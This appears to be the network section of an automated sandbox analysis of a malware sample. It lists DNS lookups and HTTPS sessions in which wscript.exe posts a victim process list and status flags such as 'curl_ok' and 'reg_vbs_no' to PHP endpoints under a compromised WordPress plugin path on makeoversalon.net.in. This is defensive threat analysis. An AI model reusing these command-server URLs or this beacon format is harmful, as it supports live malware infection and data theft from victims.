Apr 20, 2024 08:26:06.976986885 CEST	53	57858	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 20, 2024 08:24:03.161386967 CEST	192.168.2.4	1.1.1.1	c22c	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 20, 2024 08:24:02.444825888 CEST	192.168.2.4	1.1.1.1	0x695f	Standard query (0)	makeoversalon.net.in	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:02.444952011 CEST	192.168.2.4	1.1.1.1	0xfeb2	Standard query (0)	makeoversalon.net.in	65	IN (0x0001)	false
Apr 20, 2024 08:24:03.349505901 CEST	192.168.2.4	1.1.1.1	0x99bb	Standard query (0)	makeoversalon.net.in	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:06.757318974 CEST	192.168.2.4	1.1.1.1	0xe4d6	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:06.757581949 CEST	192.168.2.4	1.1.1.1	0x74ad	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 20, 2024 08:24:09.362991095 CEST	192.168.2.4	1.1.1.1	0x181	Standard query (0)	recaptcha.net	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:09.363733053 CEST	192.168.2.4	1.1.1.1	0x6fec	Standard query (0)	recaptcha.net	65	IN (0x0001)	false
Apr 20, 2024 08:24:09.375439882 CEST	192.168.2.4	1.1.1.1	0xd4bc	Standard query (0)	admin.bitninja.io	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:09.375808001 CEST	192.168.2.4	1.1.1.1	0x97ca	Standard query (0)	admin.bitninja.io	65	IN (0x0001)	false
Apr 20, 2024 08:24:10.338191986 CEST	192.168.2.4	1.1.1.1	0x76a7	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:10.338463068 CEST	192.168.2.4	1.1.1.1	0x9469	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false
Apr 20, 2024 08:24:10.343369961 CEST	192.168.2.4	1.1.1.1	0xd21a	Standard query (0)	admin.bitninja.io	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:10.343497992 CEST	192.168.2.4	1.1.1.1	0x8ce1	Standard query (0)	admin.bitninja.io	65	IN (0x0001)	false
Apr 20, 2024 08:24:11.097042084 CEST	192.168.2.4	1.1.1.1	0xb3e6	Standard query (0)	recaptcha.net	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.097253084 CEST	192.168.2.4	1.1.1.1	0xe93b	Standard query (0)	recaptcha.net	65	IN (0x0001)	false
Apr 20, 2024 08:24:11.170840025 CEST	192.168.2.4	1.1.1.1	0x2f50	Standard query (0)	analytics.google.com	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.171030998 CEST	192.168.2.4	1.1.1.1	0xc2ba	Standard query (0)	analytics.google.com	65	IN (0x0001)	false
Apr 20, 2024 08:24:11.171960115 CEST	192.168.2.4	1.1.1.1	0x172c	Standard query (0)	stats.g.doubleclick.net	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.172269106 CEST	192.168.2.4	1.1.1.1	0x93d6	Standard query (0)	stats.g.doubleclick.net	65	IN (0x0001)	false
Apr 20, 2024 08:24:11.968075991 CEST	192.168.2.4	1.1.1.1	0x21d4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.968202114 CEST	192.168.2.4	1.1.1.1	0x5d60	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 20, 2024 08:24:11.969780922 CEST	192.168.2.4	1.1.1.1	0xf5e7	Standard query (0)	stats.g.doubleclick.net	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.969923019 CEST	192.168.2.4	1.1.1.1	0x5523	Standard query (0)	stats.g.doubleclick.net	65	IN (0x0001)	false
Apr 20, 2024 08:24:12.529021978 CEST	192.168.2.4	1.1.1.1	0x6afe	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.529289007 CEST	192.168.2.4	1.1.1.1	0xb931	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 20, 2024 08:24:12.835516930 CEST	192.168.2.4	1.1.1.1	0x4495	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.835649967 CEST	192.168.2.4	1.1.1.1	0xd340	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 20, 2024 08:26:06.871956110 CEST	192.168.2.4	1.1.1.1	0x3f22	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:26:06.872155905 CEST	192.168.2.4	1.1.1.1	0x78dd	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 20, 2024 08:24:02.794734001 CEST	1.1.1.1	192.168.2.4	0x695f	No error (0)	makeoversalon.net.in		5.9.123.217	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:03.951672077 CEST	1.1.1.1	192.168.2.4	0x99bb	No error (0)	makeoversalon.net.in		5.9.123.217	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:06.861747980 CEST	1.1.1.1	192.168.2.4	0xe4d6	No error (0)	www.google.com		172.253.124.147	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:06.861747980 CEST	1.1.1.1	192.168.2.4	0xe4d6	No error (0)	www.google.com		172.253.124.104	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:06.861747980 CEST	1.1.1.1	192.168.2.4	0xe4d6	No error (0)	www.google.com		172.253.124.103	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:06.861747980 CEST	1.1.1.1	192.168.2.4	0xe4d6	No error (0)	www.google.com		172.253.124.106	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:06.861747980 CEST	1.1.1.1	192.168.2.4	0xe4d6	No error (0)	www.google.com		172.253.124.105	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:06.861747980 CEST	1.1.1.1	192.168.2.4	0xe4d6	No error (0)	www.google.com		172.253.124.99	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:06.862077951 CEST	1.1.1.1	192.168.2.4	0x74ad	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 20, 2024 08:24:09.467430115 CEST	1.1.1.1	192.168.2.4	0x181	No error (0)	recaptcha.net		74.125.136.94	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:09.482430935 CEST	1.1.1.1	192.168.2.4	0x97ca	No error (0)	admin.bitninja.io			65	IN (0x0001)	false
Apr 20, 2024 08:24:09.482659101 CEST	1.1.1.1	192.168.2.4	0xd4bc	No error (0)	admin.bitninja.io		104.26.14.182	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:09.482659101 CEST	1.1.1.1	192.168.2.4	0xd4bc	No error (0)	admin.bitninja.io		104.26.15.182	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:09.482659101 CEST	1.1.1.1	192.168.2.4	0xd4bc	No error (0)	admin.bitninja.io		172.67.74.40	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:10.442657948 CEST	1.1.1.1	192.168.2.4	0x76a7	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:10.449830055 CEST	1.1.1.1	192.168.2.4	0xd21a	No error (0)	admin.bitninja.io		104.26.15.182	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:10.449830055 CEST	1.1.1.1	192.168.2.4	0xd21a	No error (0)	admin.bitninja.io		104.26.14.182	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:10.449830055 CEST	1.1.1.1	192.168.2.4	0xd21a	No error (0)	admin.bitninja.io		172.67.74.40	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:10.450257063 CEST	1.1.1.1	192.168.2.4	0x8ce1	No error (0)	admin.bitninja.io			65	IN (0x0001)	false
Apr 20, 2024 08:24:11.201663971 CEST	1.1.1.1	192.168.2.4	0xb3e6	No error (0)	recaptcha.net		74.125.136.94	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.275240898 CEST	1.1.1.1	192.168.2.4	0x2f50	No error (0)	analytics.google.com	analytics-alv.google.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 20, 2024 08:24:11.275240898 CEST	1.1.1.1	192.168.2.4	0x2f50	No error (0)	analytics-alv.google.com		216.239.38.181	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.275240898 CEST	1.1.1.1	192.168.2.4	0x2f50	No error (0)	analytics-alv.google.com		216.239.34.181	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.275240898 CEST	1.1.1.1	192.168.2.4	0x2f50	No error (0)	analytics-alv.google.com		216.239.36.181	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.275240898 CEST	1.1.1.1	192.168.2.4	0x2f50	No error (0)	analytics-alv.google.com		216.239.32.181	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.275732040 CEST	1.1.1.1	192.168.2.4	0xc2ba	No error (0)	analytics.google.com	analytics-alv.google.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 20, 2024 08:24:11.276312113 CEST	1.1.1.1	192.168.2.4	0x172c	No error (0)	stats.g.doubleclick.net		74.125.136.154	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.276312113 CEST	1.1.1.1	192.168.2.4	0x172c	No error (0)	stats.g.doubleclick.net		74.125.136.157	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.276312113 CEST	1.1.1.1	192.168.2.4	0x172c	No error (0)	stats.g.doubleclick.net		74.125.136.156	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:11.276312113 CEST	1.1.1.1	192.168.2.4	0x172c	No error (0)	stats.g.doubleclick.net		74.125.136.155	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.072226048 CEST	1.1.1.1	192.168.2.4	0x21d4	No error (0)	www.google.com		142.250.105.104	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.072226048 CEST	1.1.1.1	192.168.2.4	0x21d4	No error (0)	www.google.com		142.250.105.147	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.072226048 CEST	1.1.1.1	192.168.2.4	0x21d4	No error (0)	www.google.com		142.250.105.105	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.072226048 CEST	1.1.1.1	192.168.2.4	0x21d4	No error (0)	www.google.com		142.250.105.99	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.072226048 CEST	1.1.1.1	192.168.2.4	0x21d4	No error (0)	www.google.com		142.250.105.103	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.072226048 CEST	1.1.1.1	192.168.2.4	0x21d4	No error (0)	www.google.com		142.250.105.106	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.072360039 CEST	1.1.1.1	192.168.2.4	0x5d60	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 20, 2024 08:24:12.074040890 CEST	1.1.1.1	192.168.2.4	0xf5e7	No error (0)	stats.g.doubleclick.net		64.233.177.157	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.074040890 CEST	1.1.1.1	192.168.2.4	0xf5e7	No error (0)	stats.g.doubleclick.net		64.233.177.154	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.074040890 CEST	1.1.1.1	192.168.2.4	0xf5e7	No error (0)	stats.g.doubleclick.net		64.233.177.156	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.074040890 CEST	1.1.1.1	192.168.2.4	0xf5e7	No error (0)	stats.g.doubleclick.net		64.233.177.155	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.634907007 CEST	1.1.1.1	192.168.2.4	0x6afe	No error (0)	www.google.com		64.233.185.147	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.634907007 CEST	1.1.1.1	192.168.2.4	0x6afe	No error (0)	www.google.com		64.233.185.99	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.634907007 CEST	1.1.1.1	192.168.2.4	0x6afe	No error (0)	www.google.com		64.233.185.106	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.634907007 CEST	1.1.1.1	192.168.2.4	0x6afe	No error (0)	www.google.com		64.233.185.105	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.634907007 CEST	1.1.1.1	192.168.2.4	0x6afe	No error (0)	www.google.com		64.233.185.104	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.634907007 CEST	1.1.1.1	192.168.2.4	0x6afe	No error (0)	www.google.com		64.233.185.103	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.635194063 CEST	1.1.1.1	192.168.2.4	0xb931	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 20, 2024 08:24:12.940186977 CEST	1.1.1.1	192.168.2.4	0x4495	No error (0)	www.google.com		172.253.124.106	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.940186977 CEST	1.1.1.1	192.168.2.4	0x4495	No error (0)	www.google.com		172.253.124.105	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.940186977 CEST	1.1.1.1	192.168.2.4	0x4495	No error (0)	www.google.com		172.253.124.104	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.940186977 CEST	1.1.1.1	192.168.2.4	0x4495	No error (0)	www.google.com		172.253.124.147	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.940186977 CEST	1.1.1.1	192.168.2.4	0x4495	No error (0)	www.google.com		172.253.124.103	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.940186977 CEST	1.1.1.1	192.168.2.4	0x4495	No error (0)	www.google.com		172.253.124.99	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:24:12.940233946 CEST	1.1.1.1	192.168.2.4	0xd340	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 20, 2024 08:26:06.976902962 CEST	1.1.1.1	192.168.2.4	0x78dd	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 20, 2024 08:26:06.976986885 CEST	1.1.1.1	192.168.2.4	0x3f22	No error (0)	www.google.com		74.125.136.106	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:26:06.976986885 CEST	1.1.1.1	192.168.2.4	0x3f22	No error (0)	www.google.com		74.125.136.105	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:26:06.976986885 CEST	1.1.1.1	192.168.2.4	0x3f22	No error (0)	www.google.com		74.125.136.99	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:26:06.976986885 CEST	1.1.1.1	192.168.2.4	0x3f22	No error (0)	www.google.com		74.125.136.103	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:26:06.976986885 CEST	1.1.1.1	192.168.2.4	0x3f22	No error (0)	www.google.com		74.125.136.104	A (IP address)	IN (0x0001)	false
Apr 20, 2024 08:26:06.976986885 CEST	1.1.1.1	192.168.2.4	0x3f22	No error (0)	www.google.com		74.125.136.147	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

makeoversalon.net.in

https:

admin.bitninja.io

analytics.google.com

stats.g.doubleclick.net

www.google.com

fs.microsoft.com

a.nel.cloudflare.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	5.9.123.217	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:03 UTC	722	OUT	GET /wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx HTTP/1.1 Host: makeoversalon.net.in Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:03 UTC	245	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Sat, 20 Apr 2024 06:24:03 GMT Content-Length: 13791 Connection: close
2024-04-20 06:24:03 UTC	13791	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	5.9.123.217	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:04 UTC	655	OUT	GET /favicon.ico HTTP/1.1 Host: makeoversalon.net.in Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:04 UTC	241	IN	HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Sat, 20 Apr 2024 06:24:04 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	5.9.123.217	443	7268	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:04 UTC	475	OUT	POST /wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: makeoversalon.net.in Content-Length: 3991 Connection: Keep-Alive Cache-Control: no-cache
2024-04-20 06:24:04 UTC	3991	OUT	Data Raw: 70 3d 73 79 73 74 65 6d 5f 69 64 6c 65 5f 70 72 6f 63 65 73 73 5f 73 79 73 74 65 6d 5f 72 65 67 69 73 74 72 79 5f 73 6d 73 73 2e 65 78 65 5f 63 73 72 73 73 2e 65 78 65 5f 77 69 6e 69 6e 69 74 2e 65 78 65 5f 63 73 72 73 73 2e 65 78 65 5f 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 5f 73 65 72 76 69 63 65 73 2e 65 78 65 5f 6c 73 61 73 73 2e 65 78 65 5f 73 76 63 68 6f 73 74 2e 65 78 65 5f 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 5f 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 5f 73 76 63 68 6f 73 74 2e 65 78 65 5f 73 76 63 68 6f 73 74 2e 65 78 65 5f 64 77 6d 2e 65 78 65 5f 73 76 63 68 6f 73 74 2e 65 78 65 5f 73 76 63 68 6f 73 74 2e 65 78 65 5f 73 76 63 68 6f 73 74 2e 65 78 65 5f 73 76 63 68 6f 73 74 2e 65 78 65 5f 73 76 63 68 6f 73 74 2e 65 78 65 5f 73 76 63 68 Data Ascii: p=system_idle_process_system_registry_smss.exe_csrss.exe_wininit.exe_csrss.exe_winlogon.exe_services.exe_lsass.exe_svchost.exe_fontdrvhost.exe_fontdrvhost.exe_svchost.exe_svchost.exe_dwm.exe_svchost.exe_svchost.exe_svchost.exe_svchost.exe_svchost.exe_svch
2024-04-20 06:24:04 UTC	245	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Sat, 20 Apr 2024 06:24:04 GMT Content-Length: 13781 Connection: close
2024-04-20 06:24:04 UTC	13781	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	5.9.123.217	443	7268	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:05 UTC	474	OUT	POST /wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: makeoversalon.net.in Content-Length: 50 Connection: Keep-Alive Cache-Control: no-cache
2024-04-20 06:24:05 UTC	50	OUT	Data Raw: 63 75 72 6c 5f 6f 6b 5f 45 4e 54 45 52 45 4e 54 45 52 72 65 67 5f 76 62 73 5f 6e 6f 5f 45 4e 54 45 52 73 63 68 5f 76 62 73 5f 6e 6f 5f 45 4e 54 45 52 Data Ascii: curl_ok_ENTERENTERreg_vbs_no_ENTERsch_vbs_no_ENTER
2024-04-20 06:24:06 UTC	245	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Sat, 20 Apr 2024 06:24:05 GMT Content-Length: 45221 Connection: close
2024-04-20 06:24:06 UTC	15115	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 56 69 73 69 74 6f 72 20 61 6e 74 69 2d 72 6f 62 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"/> <title>Visitor anti-robot validation</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name=
2024-04-20 06:24:06 UTC	16384	IN	Data Raw: 91 74 2c 20 68 6f 67 79 20 49 50 20 63 c3 ad 6d 65 20 66 65 6c 6f 6c 64 c3 a1 73 72 61 20 6b 65 72 c3 bc 6c 6a c3 b6 6e 2e 22 2c 0a 20 20 20 20 20 20 20 20 42 45 53 54 5f 52 45 47 41 52 44 53 3a 20 22 4b c3 b6 73 7a c3 b6 6e 6a c3 bc 6b 20 65 67 79 c3 bc 74 74 6d c5 b1 6b c3 b6 64 c3 a9 73 c3 a9 74 2c 22 2c 0a 20 20 20 20 20 20 20 20 53 49 47 4e 41 54 55 52 45 3a 20 22 41 20 42 69 74 6e 69 6e 6a 61 20 63 73 61 70 61 74 61 22 2c 0a 20 20 20 20 20 20 20 20 41 43 43 45 53 53 49 4e 47 3a 20 22 41 22 2c 0a 20 20 20 20 20 20 20 20 53 45 43 55 52 45 4c 59 3a 20 22 6f 6c 64 61 6c 20 62 69 7a 74 6f 6e 73 c3 a1 67 6f 73 20 65 6c c3 a9 72 c3 a9 73 65 2e 22 2c 0a 20 20 20 20 20 20 20 20 50 52 4f 43 45 53 53 3a 0a 20 20 20 20 20 20 20 20 20 20 22 45 7a 20 65 67 79 20 Data Ascii: t, hogy IP cme feloldsra kerljn.", BEST_REGARDS: "Ksznjk egyttmkdst,", SIGNATURE: "A Bitninja csapata", ACCESSING: "A", SECURELY: "oldal biztonsgos elrse.", PROCESS: "Ez egy
2024-04-20 06:24:06 UTC	13722	IN	Data Raw: 59 33 4e 7a 62 44 49 69 6a 43 49 53 67 33 4e 7a 62 44 49 69 67 33 4e 7a 5a 79 63 6e 4c 44 49 69 6a 44 49 69 67 33 4e 7a 62 44 49 69 6a 44 49 69 68 66 58 6c 34 33 4e 7a 59 33 4e 7a 59 35 4f 54 6a 44 49 69 67 33 4e 7a 62 43 49 69 67 33 4e 7a 59 33 4e 7a 62 41 49 69 67 34 4f 54 6a 44 49 69 67 32 4e 6a 55 33 4e 7a 62 42 49 69 6a 42 49 53 6a 42 49 53 63 33 4f 44 66 44 49 69 67 32 4e 6a 55 32 4e 6a 55 2f 50 7a 35 43 51 55 42 46 51 6b 48 44 49 69 6a 44 49 69 67 33 4e 7a 62 44 49 69 67 32 4e 6a 57 38 4a 43 72 44 49 69 67 33 4e 6a 62 43 49 69 67 34 4f 44 66 43 49 53 6a 44 49 69 6a 44 49 69 6a 42 49 69 67 32 4e 6a 55 34 4f 44 65 37 4a 69 77 32 4e 6a 55 32 4e 6a 58 44 49 69 6a 44 49 69 6a 44 49 69 67 34 4f 44 63 32 4e 7a 58 42 49 69 69 39 49 43 59 36 4f 6a 6e 43 49 Data Ascii: 